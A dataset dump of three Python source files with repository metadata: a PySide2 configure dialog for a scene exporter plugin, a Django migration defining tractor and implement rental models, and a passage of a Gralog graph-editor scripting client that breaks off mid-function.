fe68c2686760a20f5158d8a2bc5c4a835377dc27 | 6,801 | py | Python | mapclientplugins/argonsceneexporterstep/ui_configuredialog.py | Kayvv/mapclientplugins.argonsceneexporterstep | 59b0b9cb15660c5747c1a7cba9da0e1eaf0bdf48 | [
"Apache-2.0"
] | null | null | null | mapclientplugins/argonsceneexporterstep/ui_configuredialog.py | Kayvv/mapclientplugins.argonsceneexporterstep | 59b0b9cb15660c5747c1a7cba9da0e1eaf0bdf48 | [
"Apache-2.0"
] | null | null | null | mapclientplugins/argonsceneexporterstep/ui_configuredialog.py | Kayvv/mapclientplugins.argonsceneexporterstep | 59b0b9cb15660c5747c1a7cba9da0e1eaf0bdf48 | [
"Apache-2.0"
] | 3 | 2021-07-26T00:53:24.000Z | 2021-11-17T23:23:11.000Z | # -*- coding: utf-8 -*-
################################################################################
## Form generated from reading UI file 'configuredialog.ui'
##
## Created by: Qt User Interface Compiler version 5.15.2
##
## WARNING! All changes made in this file will be lost when recompiling UI file!
################################################################################
from PySide2.QtCore import *
from PySide2.QtGui import *
from PySide2.QtWidgets import *
class Ui_ConfigureDialog(object):
def setupUi(self, ConfigureDialog):
if not ConfigureDialog.objectName():
ConfigureDialog.setObjectName(u"ConfigureDialog")
ConfigureDialog.resize(510, 342)
self.gridLayout = QGridLayout(ConfigureDialog)
self.gridLayout.setObjectName(u"gridLayout")
self.configGroupBox = QGroupBox(ConfigureDialog)
self.configGroupBox.setObjectName(u"configGroupBox")
self.formLayout = QFormLayout(self.configGroupBox)
self.formLayout.setObjectName(u"formLayout")
self.label0 = QLabel(self.configGroupBox)
self.label0.setObjectName(u"label0")
self.formLayout.setWidget(0, QFormLayout.LabelRole, self.label0)
self.lineEditIdentifier = QLineEdit(self.configGroupBox)
self.lineEditIdentifier.setObjectName(u"lineEditIdentifier")
self.formLayout.setWidget(0, QFormLayout.FieldRole, self.lineEditIdentifier)
self.label_3 = QLabel(self.configGroupBox)
self.label_3.setObjectName(u"label_3")
self.formLayout.setWidget(1, QFormLayout.LabelRole, self.label_3)
self.prefix_lineEdit = QLineEdit(self.configGroupBox)
self.prefix_lineEdit.setObjectName(u"prefix_lineEdit")
self.formLayout.setWidget(1, QFormLayout.FieldRole, self.prefix_lineEdit)
self.label_4 = QLabel(self.configGroupBox)
self.label_4.setObjectName(u"label_4")
self.formLayout.setWidget(3, QFormLayout.LabelRole, self.label_4)
self.timeSteps_lineEdit = QLineEdit(self.configGroupBox)
self.timeSteps_lineEdit.setObjectName(u"timeSteps_lineEdit")
self.formLayout.setWidget(3, QFormLayout.FieldRole, self.timeSteps_lineEdit)
self.label = QLabel(self.configGroupBox)
self.label.setObjectName(u"label")
self.formLayout.setWidget(4, QFormLayout.LabelRole, self.label)
self.initialTime_lineEdit = QLineEdit(self.configGroupBox)
self.initialTime_lineEdit.setObjectName(u"initialTime_lineEdit")
self.formLayout.setWidget(4, QFormLayout.FieldRole, self.initialTime_lineEdit)
self.label_2 = QLabel(self.configGroupBox)
self.label_2.setObjectName(u"label_2")
self.formLayout.setWidget(5, QFormLayout.LabelRole, self.label_2)
self.finishTime_lineEdit = QLineEdit(self.configGroupBox)
self.finishTime_lineEdit.setObjectName(u"finishTime_lineEdit")
self.formLayout.setWidget(5, QFormLayout.FieldRole, self.finishTime_lineEdit)
self.label1 = QLabel(self.configGroupBox)
self.label1.setObjectName(u"label1")
self.formLayout.setWidget(6, QFormLayout.LabelRole, self.label1)
self.horizontalLayout = QHBoxLayout()
self.horizontalLayout.setObjectName(u"horizontalLayout")
self.lineEditOutputDirectory = QLineEdit(self.configGroupBox)
self.lineEditOutputDirectory.setObjectName(u"lineEditOutputDirectory")
self.horizontalLayout.addWidget(self.lineEditOutputDirectory)
self.pushButtonOutputDirectory = QPushButton(self.configGroupBox)
self.pushButtonOutputDirectory.setObjectName(u"pushButtonOutputDirectory")
self.horizontalLayout.addWidget(self.pushButtonOutputDirectory)
self.formLayout.setLayout(6, QFormLayout.FieldRole, self.horizontalLayout)
self.label_5 = QLabel(self.configGroupBox)
self.label_5.setObjectName(u"label_5")
self.formLayout.setWidget(2, QFormLayout.LabelRole, self.label_5)
self.comboBoxExportType = QComboBox(self.configGroupBox)
self.comboBoxExportType.addItem("")
self.comboBoxExportType.addItem("")
self.comboBoxExportType.setObjectName(u"comboBoxExportType")
self.formLayout.setWidget(2, QFormLayout.FieldRole, self.comboBoxExportType)
self.gridLayout.addWidget(self.configGroupBox, 0, 0, 1, 1)
self.buttonBox = QDialogButtonBox(ConfigureDialog)
self.buttonBox.setObjectName(u"buttonBox")
self.buttonBox.setOrientation(Qt.Horizontal)
self.buttonBox.setStandardButtons(QDialogButtonBox.Cancel|QDialogButtonBox.Ok)
self.gridLayout.addWidget(self.buttonBox, 1, 0, 1, 1)
QWidget.setTabOrder(self.lineEditIdentifier, self.prefix_lineEdit)
QWidget.setTabOrder(self.prefix_lineEdit, self.comboBoxExportType)
QWidget.setTabOrder(self.comboBoxExportType, self.timeSteps_lineEdit)
QWidget.setTabOrder(self.timeSteps_lineEdit, self.initialTime_lineEdit)
QWidget.setTabOrder(self.initialTime_lineEdit, self.finishTime_lineEdit)
QWidget.setTabOrder(self.finishTime_lineEdit, self.lineEditOutputDirectory)
QWidget.setTabOrder(self.lineEditOutputDirectory, self.pushButtonOutputDirectory)
self.retranslateUi(ConfigureDialog)
self.buttonBox.accepted.connect(ConfigureDialog.accept)
self.buttonBox.rejected.connect(ConfigureDialog.reject)
self.comboBoxExportType.setCurrentIndex(0)
QMetaObject.connectSlotsByName(ConfigureDialog)
# setupUi
def retranslateUi(self, ConfigureDialog):
ConfigureDialog.setWindowTitle(QCoreApplication.translate("ConfigureDialog", u"Configure Step", None))
self.configGroupBox.setTitle("")
self.label0.setText(QCoreApplication.translate("ConfigureDialog", u"identifier: ", None))
self.label_3.setText(QCoreApplication.translate("ConfigureDialog", u"Prefix : ", None))
self.label_4.setText(QCoreApplication.translate("ConfigureDialog", u"Time Steps : ", None))
self.label.setText(QCoreApplication.translate("ConfigureDialog", u"Initial Time : ", None))
self.label_2.setText(QCoreApplication.translate("ConfigureDialog", u"Finish Time : ", None))
self.label1.setText(QCoreApplication.translate("ConfigureDialog", u"Output directory:", None))
self.pushButtonOutputDirectory.setText(QCoreApplication.translate("ConfigureDialog", u"...", None))
self.label_5.setText(QCoreApplication.translate("ConfigureDialog", u"Export type:", None))
self.comboBoxExportType.setItemText(0, QCoreApplication.translate("ConfigureDialog", u"webgl", None))
self.comboBoxExportType.setItemText(1, QCoreApplication.translate("ConfigureDialog", u"thumbnail", None))
# retranslateUi
| 44.45098 | 113 | 0.723276 | 642 | 6,801 | 7.5919 | 0.190031 | 0.06032 | 0.07222 | 0.092532 | 0.24723 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012017 | 0.155712 | 6,801 | 152 | 114 | 44.743421 | 0.836816 | 0.034113 | 0 | 0.021053 | 1 | 0 | 0.088208 | 0.007507 | 0 | 0 | 0 | 0 | 0 | 1 | 0.021053 | false | 0 | 0.031579 | 0 | 0.063158 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fe6de4a21365edf7ffd30ec000387c588b119366 | 9,086 | py | Python | equipments/migrations/0001_initial.py | fagrimacs/fagrimacs_production | ea1a8f92c41c416309cc1fdd8deb02f41a9c95a0 | [
"MIT"
] | null | null | null | equipments/migrations/0001_initial.py | fagrimacs/fagrimacs_production | ea1a8f92c41c416309cc1fdd8deb02f41a9c95a0 | [
"MIT"
] | 8 | 2020-09-16T05:28:33.000Z | 2020-09-28T06:29:03.000Z | equipments/migrations/0001_initial.py | fagrimacs/fagrimacs_production | ea1a8f92c41c416309cc1fdd8deb02f41a9c95a0 | [
"MIT"
] | null | null | null | # Generated by Django 3.0.7 on 2020-09-18 05:52
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import multiselectfield.db.fields
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Equipment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('type', models.CharField(choices=[(None, 'Please select'), ('tractor', 'Tractor'), ('implement', 'Implement'), ('other_equipment', 'Other Equipment')], max_length=100, verbose_name='What Equipment you want to Add?')),
],
),
migrations.CreateModel(
name='ImplementCategory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('image', models.ImageField(upload_to='implements_category')),
],
options={
'verbose_name_plural': 'Implement Categories',
},
),
migrations.CreateModel(
name='Phone',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('phone', models.CharField(max_length=18)),
],
),
migrations.CreateModel(
name='TractorCategory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('image', models.ImageField(upload_to='tractor_category')),
],
options={
'verbose_name_plural': 'Tractor Categories',
},
),
migrations.CreateModel(
name='Tractor',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True)),
('modified', models.DateTimeField(auto_now=True)),
('drive_type', models.CharField(choices=[(None, 'Please Select'), ('two wheel drive', 'Two wheel Drive'), ('four wheel drive', 'Four wheel Drive')], max_length=100, verbose_name='What Drive Type')),
('name', models.CharField(help_text='eg. John Deere 6190R', max_length=200, verbose_name='Name/Models of Tractor')),
('mode_of_transmission', models.CharField(choices=[(None, 'Please Select'), ('gear', 'Gear'), ('manual', 'Manual'), ('hydrostatic', 'Hydrostatic'), ('turbochanged', 'Turbocharged')], max_length=100, verbose_name='Mode of Transmission')),
('engine_hp', models.PositiveIntegerField(verbose_name='Engine Horse Power (eg. 75hp)')),
('drawbar_hp', models.PositiveIntegerField(verbose_name='Drawbar Horse Power (eg. 65hp)')),
('pto_hp', models.PositiveIntegerField(verbose_name='PTO Horse Power (eg. 85hp)')),
('hydraulic_capacity', models.CharField(help_text='Use a SI units of gpm or psi', max_length=100, verbose_name='Hydaulic capacity (gallon per minutes(gpm) or psi-pound per square inchies)')),
('type_of_hitching', models.CharField(choices=[(None, 'Please Select'), ('two point hitches', 'Two-point hitches'), ('three point hitches', 'Three-point hitches')], max_length=100, verbose_name='What is Hitching type?')),
('cab', models.BooleanField(default=False, verbose_name='Does have a cab?')),
('rollover_protection', models.BooleanField(default=False, verbose_name='Does have the rollover protection?')),
('fuel_consumption', models.PositiveIntegerField(verbose_name='Fuel consumption (gallon per hour on operation)')),
('attachment_mode', models.CharField(choices=[(None, 'Please select'), ('frontend loader', 'frontend loader'), ('backhoe', 'Backhoe'), ('both', 'Both')], max_length=100, verbose_name='What mode of attachment?')),
('operator', models.BooleanField(default=False, verbose_name='Do you have an operator(s)?')),
('file', models.FileField(help_text='Upload quality picture of real tractor you have, only 5 picture.', upload_to='tractors_photos/', verbose_name='Upload the Tractor pictures')),
('other_informations', models.TextField(blank=True, verbose_name='Describe your Tractor')),
('price_hour', models.PositiveIntegerField(verbose_name='Specify the price per Hour in TShs.')),
('price_hectare', models.PositiveIntegerField(verbose_name='Specify the price per Hectare')),
('farm_services', multiselectfield.db.fields.MultiSelectField(choices=[('soil cultivations', 'Soil cultivations'), ('planting', 'Planting'), ('haversting/post-haversting', 'Haversting/Post-Haversting'), ('fertilizing & pest-control', 'Fertilizing & Pest-control'), ('drainage & irrigation', 'Drainage & Irrigation'), ('loading', 'Loading'), ('hay making', 'Hay making'), ('miscellaneous', 'Miscellaneous')], max_length=135, verbose_name='What are farming service(s) do you offer?')),
('agree_terms', models.BooleanField(default=False, verbose_name='Do your Accept our Terms and Conditions?')),
('status', models.CharField(choices=[('pending', 'Pending'), ('approved', 'Approved')], default='pending', max_length=100)),
('tractor_type', models.ForeignKey(on_delete=models.SET('others'), to='equipments.TractorCategory', verbose_name='What type of Tractor?')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='ImplementSubCategory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('category', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='equipments.ImplementCategory')),
],
options={
'verbose_name_plural': 'Implement Subcategories',
},
),
migrations.CreateModel(
name='Implement',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True)),
('modified', models.DateTimeField(auto_now=True)),
('name', models.CharField(max_length=100, verbose_name='Name/Models of Implement')),
('width', models.PositiveIntegerField(help_text='SI UNITS in metre', verbose_name='Width of the Implement')),
('weight', models.PositiveIntegerField(help_text='SI UNITS in KG', verbose_name='Weight of the Implement')),
('operation_mode', models.CharField(choices=[(None, 'Please Select'), ('tractor drive', 'Tractor drive'), ('self-propelled', 'Self-propelled')], max_length=100, verbose_name='What is mode of operation?')),
('pto', models.PositiveIntegerField(verbose_name='What is Horse Power required for Operation?')),
('hydraulic_capacity', models.CharField(max_length=100, verbose_name='What is Hydaulic capacity required to lift?')),
('operator', models.BooleanField(verbose_name='Do you have an operator(s)?')),
('file', models.FileField(help_text='Upload quality picture of real implement you have, only 5 pictures.', upload_to='implements_photos/', verbose_name='Upload the Implement pictures')),
('other_informations', models.TextField(blank=True, verbose_name='Describe your Implement')),
('price_hour', models.PositiveIntegerField(verbose_name='Specify the price per Hour')),
('price_hectare', models.PositiveIntegerField(verbose_name='Specify the price per Hectare')),
('agree_terms', models.BooleanField(default=False, verbose_name='Do your Accept our Terms and Conditions?')),
('status', models.CharField(choices=[('pending', 'Pending'), ('approved', 'Approved')], default='pending', max_length=100)),
('category', models.ForeignKey(on_delete=models.SET('others'), to='equipments.ImplementCategory', verbose_name='What category of your Implement')),
('subcategory', models.ForeignKey(on_delete=models.SET('others'), to='equipments.ImplementSubCategory', verbose_name='What is subcategory of your Implement')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| 75.716667 | 499 | 0.637134 | 959 | 9,086 | 5.893639 | 0.224192 | 0.08758 | 0.029724 | 0.030255 | 0.587226 | 0.509377 | 0.487615 | 0.402335 | 0.382166 | 0.355096 | 0 | 0.010819 | 0.216707 | 9,086 | 119 | 500 | 76.352941 | 0.783336 | 0.004953 | 0 | 0.473214 | 1 | 0 | 0.323708 | 0.018254 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.035714 | 0 | 0.071429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fe70b613f1b25d8770820b6d2050c23b8fcae093 | 47,242 | py | Python | gralog-fx/src/main/java/gralog/gralogfx/piping/scripts/Gralog.py | gralog/gralog | 0ab2e3137b83950cdc4e9234d4df451a22034285 | [
"Apache-2.0",
"BSD-3-Clause"
] | 12 | 2016-11-11T13:24:48.000Z | 2022-01-27T19:49:36.000Z | gralog-fx/src/main/java/gralog/gralogfx/piping/scripts/Gralog.py | gralog/gralog | 0ab2e3137b83950cdc4e9234d4df451a22034285 | [
"Apache-2.0",
"BSD-3-Clause"
] | 6 | 2017-01-05T14:23:59.000Z | 2018-09-20T19:14:57.000Z | gralog-fx/src/main/java/gralog/gralogfx/piping/scripts/Gralog.py | gralog/gralog | 0ab2e3137b83950cdc4e9234d4df451a22034285 | [
"Apache-2.0",
"BSD-3-Clause"
] | 2 | 2019-11-25T18:17:00.000Z | 2020-06-04T21:38:50.000Z | #!/usr/bin/env python3
import sys
from random import randint
import os
try:
import networkx as nx
except:
print("gPrint#-1#" + "netwrokx not installed for " + sys.executable)
sys.stdout.flush()
try:
import igraph as ig
except:
print("gPrint#-1#" + "igraph not installed for " + sys.executable)
import xml.etree.cElementTree as ET
import math
# debugging = False
class Vertex:
def __init__(self, graph, vid):
self.sourced = False
self.id = int(vid)
self.graph = graph
self.properties = dict()
self.properties["id"] = None
self.properties["label"] = None
self.properties["color"] = None
self.properties["strokeColor"] = None
self.properties["shape"] = None
self.properties["coordinates"] = None
self.incomingEdges = []
self.outgoingEdges = []
self.incidentEdges = []
self.wasSourced = False
def sourceProperties(self, stringFromGralog):
self.sourced = True
strings = stringFromGralog.split("#")
for string in strings:
propVal = string.split("=")
valueType = ""
try:
prop = propVal[0]
valueType = propVal[1]
except:
pass
try:
valueType = valueType.split("|")
val = valueType[0]
typ = valueType[1]
castedValue = self.graph.castValueToType(val, typ)
self.properties[prop] = castedValue
except:
pass
def getId(self):
return self.id
def getLabel(self):
if not self.wasSourced:
self.source()
return self.properties["label"]
def setLabel(self, label):
label = str(label)
self.properties["label"] = label
self.graph.setVertexLabel(self.id, label)
def setCoordinates(self, coordinates):
co = self.properties["coordinates"]
x = coordinates[0]
y = coordinates[1]
if co == None:
co = (None, None)
if x == None:
x = co[0]
if y == None:
y = co[1]
newCoordinates = (x, y)
self.properties["coordinates"] = newCoordinates
self.graph.setVertexCoordinates(self.id, newCoordinates)
def setFillColor(self, colorHex=-1, colorRGB=-1):
self.setColor(colorHex, colorRGB)
def getFillColor(self):
return self.getColor()
def getColor(self):
if not self.wasSourced:
self.source()
return self.properties["color"]
def setColor(self, colorHex=-1, colorRGB=-1):
if colorHex != -1:
self.properties["fillColor"] = colorHex
elif colorRGB != -1:
self.properties["fillColor"] = colorRGB
else:
return
self.graph.setVertexFillColor(self.id, colorHex, colorRGB)
def setStrokeColor(self, colorHex=-1, colorRGB=-1):
if colorHex != -1:
self.properties["strokeColor"] = colorHex
elif colorRGB != -1:
self.properties["strokeColor"] = colorRGB
else:
return
self.graph.setVertexStrokeColor(self.id, colorHex, colorRGB)
def getStrokeColor(self):
if not self.sourced:
self.source()
return self.properties["strokeColor"]
def setRadius(self, radius):
self.properties["radius"] = radius
self.properties["width"] = radius
self.properties["height"] = radius
self.graph.setVertexRadius(self.id, radius)
def setWidth(self, width):
self.properties["width"] = width
self.graph.setVertexWidth(self.getId(), width)
def setHeight(self, height):
self.properties["height"] = height
self.graph.setVertexHeight(self.getId(), height)
def setShape(self, shape):
self.properties["shape"] = shape
self.graph.setVertexShape(self.id, shape)
def setProperty(self, otherProperty, value):
self.properties[otherProperty] = value
self.graph.setVertexProperty(self.id, otherProperty, value)
def getProperty(self, otherProperty):
if not self.sourced:
self.source()
return self.properties[otherProperty]
def get(self, prop):
if not self.sourced:
self.source()
return self.properties[prop]
def getNeighbours(self):
return self.graph.getNeighbours(self.id)
def getOutgoingNeighbours(self):
return self.graph.getOutgoingNeighbours(self.id)
def getIncomingNeighbours(self):
return self.graph.getIncomingNeighbours(self.id)
def getOutgoingEdges(self):
return self.graph.getOutgoingEdges(self.id)
def getIncomingEdges(self):
return self.graph.getIncomingEdges(self.id)
def getIncidentEdges(self):
return self.graph.getIncidentEdges(self.id)
def delete(self):
return self.graph.deleteVertex(self)
def connect(self, v1, edgeId=-1):
return self.graph.addEdge(self, v1, edgeId)
def getAllEdgesBetween(self, vertex2):
return self.graph.getAllEdgesBetween((self.id, vertex2))
def source(self):
return self.graph.getVertex(self)
def __str__(self):
return str(self.getId())
# what if i want to get a vertex? should i also get all its neighbours? how about incident edges? This is all v aufw\"andig and leads to the paradigm by which we just store the grpah in python???
class Edge:
# private methods
def __init__(self, graph, eid):
self.sourced = False
self.id = int(eid) #if -2, then imported without id like in TGF
self.graph = graph
self.properties = dict()
self.properties["id"] = None
self.properties["label"] = None
self.properties["color"] = None
self.properties["weight"] = None
self.properties["contour"] = None
self.properties["source"] = None
self.properties["target"] = None
self.wasSourced = False
def sourceProperties(self, stringFromGralog):
self.sourced = True
strings = stringFromGralog.split("#")
for string in strings:
propVal = string.split("=")
try:
prop = propVal[0]
valueType = propVal[1]
valueType = valueType.split("|")
val = valueType[0]
typ = valueType[1]
self.properties[prop] = self.graph.castValueToType(val, typ)
except:
pass
def setTarget(self, target): # don't use!!
self.properties["target"] = target
def setSource(self, source):
self.properties["source"] = source
# public methods
def getId(self):
return self.id
def setLabel(self, label):
label = str(label)
self.properties["label"] = label
self.graph.setEdgeLabel(self.id, label)
def getLabel(self):
if not self.sourced:
self.source()
return self.properties["label"]
def setColor(self, colorHex=-1, colorRGB=-1):
if colorHex != -1:
self.properties["color"] = colorHex
elif colorRGB != -1:
self.properties["color"] = colorRGB
else:
return
self.graph.setEdgeColor(self.id, colorHex, colorRGB)
def getColor(self):
if not self.sourced:
self.source()
return self.properties["color"]
def setWeight(self, weight):
self.properties["weight"] = float(weight)
self.graph.setEdgeWeight(self.id, weight)
def getWeight(self):
if not self.sourced:
self.source()
return self.properties["weight"]
def setThickness(self, thickness):
self.properties["thickness"] = float(thickness)
self.graph.setEdgeThickness(self.id, thickness)
def getThickness(self):
if not self.sourced:
self.source()
return self.properties["thickness"]
def setContour(self, contour):
self.properties["contour"] = contour
self.graph.setEdgeContour(self.id, contour)
def getContour(self):
if not self.sourced:
self.source()
return self.properties["contour"]
def getSource(self):
if not self.sourced:
self.source()
return self.properties["source"]
def getTarget(self):
if not self.sourced:
self.source()
return self.properties["target"]
def setProperty(self, otherProperty, value):
self.properties[otherProperty] = value
self.graph.setEdgeProperty(self, otherProperty, value)
def getProperty(self, otherProperty):
if not self.sourced:
self.source()
return self.properties[otherProperty]
def get(self, prop):
self.source()
return self.properties[prop]
def delete(self):
return self.graph.deleteEdge(self.id)
def source(self):
return self.graph.getEdge(self)
def getAdjacentEdges(self):
return self.graph.getAdjacentEdges(self.id)
def __str__(self):
v = self.getId()
v_str = str(v)
source = self.getSource().getId()
target = self.getTarget().getId()
return "({:},{:})".format(source, target)
def rgbFormatter(colorRGB):
r = colorRGB[0]
g = colorRGB[1]
b = colorRGB[2]
s = "rgb"
s += "(" + str(r).rstrip() + "," + \
str(g).rstrip() + "," + str(b).rstrip() + ")"
return s.rstrip()
def hexFormatter(colorHex):
s = "hex"
if colorHex[0] == "#":
colorHex = colorHex[1:]
s += "("+str(colorHex).rstrip() + ")"
return s.rstrip()
def vertexId(vertex):
if isinstance(vertex, Vertex):
return vertex.getId()
return vertex
def edgeId(edge):
if isinstance(edge, Edge):
return edge.getId()
return edge
def extractIdFromProperties(stringFromGralog):
strings = stringFromGralog.split(",")
for string in strings:
propVal = string.split("=")
if propVal[0] == "id":
return propVal[1]
return None
def edgeSplitter(edge):
if type(edge) == tuple and len(edge) == 2: # edge as defined by start, end nodes
return str(vertexId(edge[0])).rstrip()+","+str(vertexId(edge[1])).rstrip()
if type(edge) == int: # edge is given by id
return str(edge).rstrip()
return str(edge.getId()).rstrip()#edge has type Edge
class Graph:
def __init__(self, format="Undirected Graph"):
# perform analysis of graph
self.id_to_vertex = dict()
self.id_to_edge = dict()
self.lastIndex = -1
self.id = -1
self.variablesToTrack = dict()
if format == None or format.lower() == "none":
# we want a new graph
print("useCurrentGraph")
sys.stdout.flush()
self.lastIndex = -1
self.id = sys.stdin.readline()
self.getGraph("gtgf")
else:
print(format)
sys.stdout.flush()
self.id = sys.stdin.readline()
# helper functions
def castValueToType(self, val, typ):
if typ == "float":
return float(val)
if typ == "int":
return int(val)
if typ == "bool":
return bool(val)
if typ == "string":
return str(val)
if typ == "vertex":
return self.getVertexOrNew(val)
return val
def getVertexOrNew(self, currId):
v = currId
if (isinstance(currId, str)):
currId = int(currId)
if (isinstance(currId, int)):
if currId in self.id_to_vertex:
v=self.id_to_vertex[currId]
else:
v=Vertex(self, currId)
self.id_to_vertex[currId] = v
return v
def getEdgeOrNew(self, currId):
if type(currId) == tuple:
e = self.getEdgeIdByEndpoints(currId)
return e
e = currId
if not (isinstance(currId, Edge)):
try:
e = self.id_to_edge[int(currId)]
except:
e = Edge(self, currId)
else:
gPrint("Error (getEdgeOrNew()): the argument \
is neither an edge id nor a pair of vertices.")
return e
def termToEdge(self, term):
endpoints = term.split(",")
eid = int(endpoints[0])
e = self.id_to_edge[eid]
e.sourceProperties(endpoints[0])
sourceId = int(endpoints[1])
source = self.getVertexOrNew(sourceId)
targetId = int(endpoints[2])
target = self.getVertexOrNew(targetId)
e.setSource(source)
e.setTarget(target)
return e
def representsInt(s):
try:
int(s)
return True
except ValueError:
return False
def edgifyTGFCommand(self, line):
line = line.strip()
endpoints = line.split(" ")
v1String = endpoints[0]
v1 = self.getVertexOrNew(int(v1String))
v2String = endpoints[1]
v2 = self.getVertexOrNew(int(v2String))
e = self.getEdgeOrNew(-2)
e.setSource(v1)
e.setTarget(v2)
def vertexifyTGFCommand(self, line):
line = line.strip()
vString = line[0]
v = self.getVertexOrNew(int(vString))
self.vertices[v.getId()] = v
def edgifyGTGFCommand(self, line):
line = line.strip()
endpoints = line.split(" ")
v1String = endpoints[0]
v1 = self.getVertexOrNew(int(v1String))
v2String = endpoints[1]
v2 = self.getVertexOrNew(int(v2String))
eid = int(endpoints[2])
e = self.getEdgeOrNew(eid)
e.setSource(v1)
e.setTarget(v2)
self.id_to_edge[eid] = e
def vertexifyGTGFCommand(self, line):
self.vertexifyTGFCommand(line)
def getEdgeIdByEndpoints(self, endpoints):
line = "getEdgeIdByEndpoints#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(endpoints)
print(line.rstrip())
sys.stdout.flush()
edgeId = sys.stdin.readline().rstrip()
return edgeId
def getVertex(self, vertex):
line = "getVertex#"+str(self.id).rstrip() + "#"
line = line + str(vertex).rstrip()
print (line.rstrip())
sys.stdout.flush()
vertexTuple = sys.stdin.readline().rstrip()
vertex.sourceProperties(vertexTuple)
return vertex
def getEdge(self, edge):
line = "getEdge#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
print (line.rstrip())
sys.stdout.flush()
edgeTuple = sys.stdin.readline().rstrip()
edge.sourceProperties(edgeTuple)
return edge
# end helper functions
# Graph Manipulating Functions
def addVertex(self, vertexId=-1, pos=(None, None)):
# return: Vertex object with id
line = "addVertex#" + str(self.id).rstrip()
x = -1
y = -1
vertexIdSwap = False
if type(vertexId) == tuple and pos == (None, None):
x = vertexId[0]
y = vertexId[1]
vertexId = -1
else:
x = pos[0]
y = pos[1]
if vertexId != -1:
line += "#"+str(vertexId).rstrip()
if x != None and y != None:
line += "#" + str(x).rstrip() + "#" + str(y).rstrip()
print(line)
sys.stdout.flush()
vid = sys.stdin.readline()
v = Vertex(self, vid)
self.id_to_vertex[v.getId()] = v
return v
def deleteVertex(self, v):
edges = self.getIncidentEdges(v)
for e in edges:
del self.id_to_edge[e.getId()]
v = vertexId(v)
del self.id_to_vertex[v]
print("deleteVertex#" + str(self.id).rstrip() + "#" + str(v))
sys.stdout.flush()
def addEdge(self, sourceVertex, targetVertex, edgeId = -1):
# return: Edge object with id only
sourceVertex = vertexId(sourceVertex)
targetVertex = vertexId(targetVertex)
idSubString = ""
if not edgeId == -1:
idSubString = "#"+str(edgeId)
line = "addEdge#"+str(self.id).rstrip() + "#" + str(sourceVertex).rstrip() + \
"#" + str(targetVertex).rstrip() + idSubString.rstrip()
print(line.rstrip())
sys.stdout.flush()
eid = sys.stdin.readline()
if eid != "\n": # it's possible that the edge cannot be added (e.g., a new selfloop)
e = Edge(self, eid)
self.id_to_edge[e.getId()] = e
return e
return None
def existsEdge(self, edge):
line = "existsEdge#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
print(line.rstrip())
sys.stdout.flush()
thereExistsAnEdge = sys.stdin.readline().rstrip()
return thereExistsAnEdge.lower() == "true"
def existsVertex(self, vertex):
line = "existsVertex#"+str(self.id).rstrip() + "#"
line = line + str(vertex).rstrip()
print(line.rstrip())
sys.stdout.flush()
thereExistsAVertex = sys.stdin.readline().rstrip()
return thereExistsAVertex.lower() == "true"
def deleteEdge(self, edge):
del self.id_to_edge[edge.getId()]
line = "deleteEdge#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
print(line.rstrip())
sys.stdout.flush()
def getAllEdgesBetween(self, vertexPair):
line = "getAllEdgesBetween#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(vertexPair)
print(line.rstrip())
sys.stdout.flush()
endpointList = sys.stdin.readline()
endpointList = endpointList.split("#")
edges = []
for i in range(len(endpointList)):
term = endpointList[i].rstrip()
term = term[1:-1]
e = self.termToEdge(term)
if e != None:
edges.append(e)
return edges
# creates a random Erdos-Reny graph with n id_to_vertex and edge probability p
def generateRandomGraph(self, vertexCount, p):
if not isinstance(vertexCount, int):
gPrint("Cannot generate a random graph, wrong parameter: \
vertex number must be an int.")
if vertexCount < 0:
gPrint("Cannot generate a random graph, wrong parameter: \
vertex number cannot be less than 0.")
if not isinstance(p, float) or p < 0 or p > 1.0:
gPrint("Cannot generate a random graph, wrong parameter: \
probability of an edge must be a float in [0,1].")
if vertexCount == 0:
return
vertices = []
coordinates = dict()
for id in range(vertexCount):
coordinates[id] = (10*math.cos(2*id*math.pi/vertexCount),
10*math.sin(2*id*math.pi/vertexCount))
nxgraph = nx.fast_gnp_random_graph(vertexCount, p)
d = dict()
id = 0
for nxV in nxgraph.nodes():
d[id] = nxV
id += 1
nxEdges = nxgraph.edges()
id = 0
for x in range(vertexCount):
vertices.append(self.addVertex(id, coordinates[id]))
